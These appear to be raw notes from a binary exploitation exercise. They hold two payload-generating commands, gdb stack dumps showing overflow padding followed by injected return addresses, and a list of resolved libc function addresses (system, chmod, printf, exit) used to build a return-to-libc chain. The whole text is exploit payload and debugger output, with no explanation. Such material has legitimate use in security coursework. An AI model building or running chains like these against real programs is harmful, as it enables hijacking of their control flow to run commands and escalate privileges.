"`./geninput 0xb7e4a270 0xb7e4a29b 0x80499a5 0xb7e4a29b 0x8049980 0x804850b 0xb7e4a29b 0x8049980 0xb7e2eb50 0xaaaaaaaa`"


"`./geninput 0xb7e4a270 0xb7e3b016 0xbffffec7 0xb7e3b016 0xbffff978 0xb7e3b016 0xbffff958 0xb7ed9010 0xb7e3b010 0x80499a5 0xaaaaaaaa 0xaaaaaaaa 0xb7e3afe0 0xb7e3b016 0x80499a5 0xb7ed9010 0xb7e3b010 0x80499a5 0xaaaaaaaa 0xaaaaaaaa 0xb7e2eb50 0xaaaaaaaa`"


0xbffff910:	0xbffff918	0xbffffb54	0x41414141	0x41414141
0xbffff920:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff930:	0xb7e4a270	0xb7e3b016	0xbffffec7	0xb7e3b016
0xbffff940:	0xbffff978	0xb7e3b016	0xbffff958	0xb7ed9010
0xbffff950:	0xb7e3b010	0x080499a5	0xaaaaaaaa	0xaaaaaaaa
0xbffff960:	0xb7e3afe0	0xb7e3b016	0x080499a5	0xb7ed9010
0xbffff970:	0xb7e3b010	0x080499a5	0xaaaaaaaa	0xaaaaaaaa
0xbffff980:	0xb7e2eb50	0x00000000	0x00000002


end system: 0xb7e3b010 / 0xb73b016
chmod: 0xb7ed9010
helpstr: 0x80499a5
printf: 0xb7e4a270
exit: 0xb7e2eb50

input: 0xbffffec7

param1: 0xbffff958
param2: 0xbffff978
system: 0xb7e3afe0


0xbffff940:	0xbffff948	0xbffffb80	0x41414141	0x41414141
0xbffff950:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffff960:	0xb7e4a270	0xb7e4a29b	0x080499a5	0xb7e4a29b
0xbffff970:	0x08049980	0x0804850b	0xb7e4a29b	0x08049980
0xbffff980:	0xb7e2eb50	0xaaaaaaaa	0xb7ff0e00
